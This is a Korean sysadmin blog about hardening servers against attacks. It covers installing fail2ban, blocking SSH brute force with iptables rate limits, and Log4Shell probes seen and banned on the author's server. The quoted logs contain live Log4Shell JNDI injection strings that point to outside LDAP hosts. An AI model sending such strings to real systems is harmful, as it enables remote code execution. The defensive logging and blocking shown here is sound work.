작은 행복을 위한 시

CentOS 5 fail2ban 설치

ssh 무작위 접속 시도 차단에 fail2ban이 좋다.
아래와 같이 설치하면 된다.

1. EPEL Repo 설치

CentOS/RHEL 5, 64 Bit (x86_64):
# rpm -Uvh http://dl.fedoraproject.org/pub/archive/epel/5/x86_64/epel-release-5-4.noarch.rpm


2. fail2ban 설치

yum install fail2ban


3. /etc/fail2ban/jail.conf 수정

[ssh-iptables]

enabled  = true
filter   = sshd
action   = iptables[name=SSH, port=ssh, protocol=tcp]
           sendmail-whois[name=SSH, dest=you@example.com, sender=fail2ban@example.com, sendername="Fail2Ban"]
logpath  = /var/log/secure
maxretry = 5

4. 서비스 시작

/etc/init.d/fail2ban start

[root@kl151 fail2ban]# /etc/init.d/fail2ban start
Starting fail2ban:                                         [  OK  ]
[root@kl151 fail2ban]# fail2ban-client status
Status
|- Number of jail:      1
`- Jail list:           ssh-iptables

#CentOS5 #fail2ban

Log4shell 첫 발생 외

관리중인 서버에 첫번째 log4shell 공격 확인

[11/Dec/2021:07:14:50 +0900] [xxx.xxx.xxx.189/sid#a353cf0][rid#b571a40][/${jndi:ldaps://41e1e3ec.probe001.log4j.leakix.net:8443/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:34 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b3a2cd0][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:35 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b18e3d8][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]

Log4Shell 차단용 fail2ban 세팅 후 검출

The IP 121.4.56.143 has just been banned by Fail2Ban after
1 attempts against apache-log4j.


Here is more information about 121.4.56.143:

[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '121.4.0.0 - 121.5.255.255'

% Abuse contact for '121.4.0.0 - 121.5.255.255' is 'ipas@cnnic.cn'

inetnum:        121.4.0.0 - 121.5.255.255
netname:        TencentCloud
descr:          Tencent cloud computing (Beijing) Co., Ltd.
descr:          Floor 6, Yinke Building,38 Haidian St,
descr:          Haidian District Beijing
country:        CN
admin-c:        JT1125-AP
tech-c:         JX1747-AP
abuse-c:        AC1601-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
last-modified:  2021-06-16T01:32:05Z
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-06-16T01:39:57Z
source:         APNIC

role:           ABUSE CNNICCN
address:        Beijing, China
country:        ZZ
phone:          +000000000
e-mail:         ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
nic-hdl:        AC1601-AP
remarks:        Generated from irt object IRT-CNNIC-CN
abuse-mailbox:  ipas@cnnic.cn
mnt-by:         APNIC-ABUSE
last-modified:  2020-05-14T11:19:01Z
source:         APNIC

person:         James Tian
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-84952
e-mail:         clarkcheng@tencent.com
nic-hdl:        JT1125-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:37:15Z
source:         APNIC

person:         Jimmy Xiao
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-80224
e-mail:         klayliang@tencent.com
nic-hdl:        JX1747-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:38:09Z
source:         APNIC

% Information related to '121.4.0.0/15AS45090'

route:          121.4.0.0/15
origin:         AS45090
descr:          China Internet Network Information Center
                Floor1, Building No.1 C/-Chinese Academy of Sciences
                4, South 4th Street
                Haidian District,
mnt-by:         MAINT-CNNIC-AP
last-modified:  2020-02-25T01:14:09Z
source:         APNIC

% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-JP1)


Lines containing IP:121.4.56.143 in /var/log/httpd/*access_log

/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:51 +0900] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "POST /login HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226

#log4shell #log4j #fail2ban

--

Image by Pete Linforth from Pixabay

ssh 무단 접속 시도(brute force)는 예전부터 꾸준히 있어 왔다.
비밀번호가 없거나, 너무 쉬운 비밀번호를 사용한 서버에 접속하여 그 서버를 놀이터로 쓸 수 있기 때문이다.

지금은 Fail2Ban을 이용하여 해당 시도를 차단하고 있지만
예전에는 iptables를 가지고 차단하고자 노력했었다.
그것을 자료로 남겨두고자 한다.

--Code--
iptables -A INPUT -p tcp --dport 22 --syn -m limit --limit 1/m --limit-burst 3 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 --syn -j DROP
----------
That limits ssh connections from a particular IP to 3 per minute. 
If they connect more quickly than that (say in an ssh brute force attack) it simply drops their packets. 
ssh 접속을 1분당 3번으로 제한한다.
그보다 더 많이 빠르게 접속 시도가 이루어지면 패킷을 버려진다.

검색해 보니 아래 사이트에 자세한 설명이 있어 참고에 도움이 된다.
https://sata.kr/entry/IPTables-10-IPTables로-Flooding-공격을-막아보자-4-INPUT-limit?category=778791 [SATAz BLOG]

#iptables #BruteForeceAttack #sshAttack #fail2ban
--